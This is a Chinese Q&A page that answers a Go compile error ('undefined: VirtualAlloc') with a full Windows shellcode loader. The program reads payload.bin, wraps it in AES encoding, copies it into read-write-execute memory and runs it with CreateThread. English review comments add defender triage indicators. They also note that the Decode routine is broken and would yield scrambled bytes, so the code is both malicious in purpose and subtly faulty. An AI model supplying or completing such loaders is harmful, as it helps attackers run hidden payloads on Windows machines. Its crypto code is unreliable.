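该代码调用了 Windows 系统的 API 函数(VirtualAlloc、RtlMoveMemory、CreateThread、WaitForSingleObject)。Go 不会自动声明这些名称,需要先通过 syscall 加载 kernel32.dll,再逐个查找并声明对应的函数;因此这段代码只能在 Windows 上编译运行。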

解决后的代码如下:

package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"io/ioutil"
	"syscall"
	"time"
	"unsafe"
)

// Procedure handles resolved from kernel32.dll when the package is
// initialised. MustLoadDLL and MustFindProc panic if the DLL or an export
// cannot be found, so a failed lookup stops the program before main runs.
// These declarations are what resolves the "undefined: VirtualAlloc ..."
// compile errors: the names are ordinary package variables, not built-ins.
//
// NOTE(review): allocate + copy + create-thread + wait resolved together is
// the import set of an in-process code loader, and is worth treating as a
// static triage indicator when it appears in a Go binary.
var (
	kernel32           = syscall.MustLoadDLL("kernel32.dll")
	VirtualAlloc       = kernel32.MustFindProc("VirtualAlloc")
	RtlMoveMemory      = kernel32.MustFindProc("RtlMoveMemory")
	CreateThread       = kernel32.MustFindProc("CreateThread")
	WaitForSingleObject = kernel32.MustFindProc("WaitForSingleObject")
)

// Win32 flag values passed to VirtualAlloc in exec.
// MEM_COMMIT and MEM_RESERVE are allocation-type flags.
// PAGE_EXECUTE_READWRITE is a page-protection value that makes the region
// readable, writable and executable at the same time.
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

// CipherFunc is the signature shared by the transforms handed to Crypt:
// it takes a key and an input buffer and returns the transformed bytes.
type CipherFunc func(key []byte, src []byte) []byte

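// AesCipher encrypts src with AES in CTR mode under key and returns the
// freshly generated IV followed by the ciphertext (len(src)+aes.BlockSize
// bytes in total).
//
// key must be 16, 24 or 32 bytes long. The function panics with the
// aes.KeySizeError if it is not, and with the reader error if the system
// random source fails; the signature has no error return, so a panic is the
// only way to report either condition.
//
// A new random IV is drawn on every call, so two calls with identical
// arguments return different output. CTR provides confidentiality only:
// nothing here authenticates the data, so a modified ciphertext cannot be
// detected by whoever decrypts it.
func AesCipher(key []byte, src []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		// Previously discarded, which left block nil and produced an
		// unrelated nil-pointer panic inside cipher.NewCTR.
		panic(err)
	}

	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}

	// Build the result in one buffer: IV first, ciphertext written in place
	// directly after it.
	out := make([]byte, aes.BlockSize+len(src))
	copy(out, iv)
	cipher.NewCTR(block, iv).XORKeyStream(out[aes.BlockSize:], src)
	return out
}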

// Crypt runs the supplied transform over src with key and hands back
// whatever the transform returns. It adds no behaviour of its own.
//
// Inside this function the parameter name cipher shadows the imported
// crypto/cipher package.
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	result := cipher(key, src)
	return result
}

// Encode passes the bytes of src through AesCipher (via Crypt) under key and
// returns the result, IV included, as a standard padded base64 string.
func Encode(src string, key []byte) string {
	sealed := Crypt(AesCipher, key, []byte(src))
	return base64.StdEncoding.EncodeToString(sealed)
}

// Decode base64-decodes src, drops the first 16 bytes and passes the
// remainder through AesCipher (via Crypt) under key, returning that output.
//
// What the code does, as written:
//   - The base64 error is discarded; malformed input produces a short or
//     empty decodedBytes.
//   - decodedBytes[16:] panics if fewer than 16 bytes were decoded.
//   - NOTE(review): the 16 bytes skipped here are the IV that Encode
//     prepended, and they are never used. AesCipher draws a new random IV on
//     each call, so the return value is that new IV followed by the remainder
//     XORed with an unrelated keystream. It is len(src plaintext)+16 bytes
//     long and is not the plaintext that was given to Encode.
func Decode(src string, key []byte) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(AesCipher, key, decodedBytes[16:])
	return payloadBytes
}

// exec copies charcode into newly allocated executable memory and runs it
// on a new thread in the current process, blocking until that thread exits.
//
// Every error result from the four API calls is discarded, and addr and
// handle are used without being checked. &charcode[0] panics on an empty
// slice.
//
// NOTE(review): for defenders, the observable behaviour is a private region
// that is writable and executable at once, followed by a thread whose start
// address lies inside that region rather than in a mapped image. Both are
// standard signals for memory scanners and endpoint telemetry.
func exec(charcode []byte) {
	// Reserve and commit len(charcode) bytes with PAGE_EXECUTE_READWRITE;
	// the first argument 0 lets the system choose the address.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// The argument is a time.Duration, so 5 means five nanoseconds.
	time.Sleep(5)
	// Copy the buffer from the Go slice into the allocated region.
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	// Start a thread whose entry point is the start of the copied buffer.
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	// Block with no timeout until the thread handle is signalled.
	WaitForSingleObject.Call(handle, syscall.INFINITE)
}

// readFile returns the full contents of filename.
//
// The read error is deliberately dropped: when the file is missing or
// unreadable the caller receives a nil slice and has no way to tell that
// apart from an empty file.
func readFile(filename string) []byte {
	contents, err := ioutil.ReadFile(filename)
	_ = err // discarded; see the doc comment
	return contents
}

// main reads ./payload.bin, passes its contents through Encode and then
// Decode under a key generated for this run, and hands the bytes returned by
// Decode to exec.
func main() {
	// 16 random bytes select AES-128. The key exists only in this process
	// and is neither stored nor printed.
	key := make([]byte, 16)
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	// readFile drops its error, so a missing file yields an empty string
	// here rather than a failure.
	payload := string(readFile("./payload.bin"))
	// Encode and Decode run back to back in the same process; the file on
	// disk is read exactly as stored.
	encodedPayload := Encode(payload, key)
	shellCodeHex := Decode(encodedPayload, key)
	// exec is called through a local function value; the effect is the same
	// as calling exec(shellCodeHex) directly.
	execFunc := exec
	execFunc(shellCodeHex)
}
Go 语言代码编译错误:undefined: VirtualAlloc、RtlMoveMemory、CreateThread  解决方法

原文地址: https://www.cveoy.top/t/topic/lKT8 著作权归作者所有。请勿转载和采集!
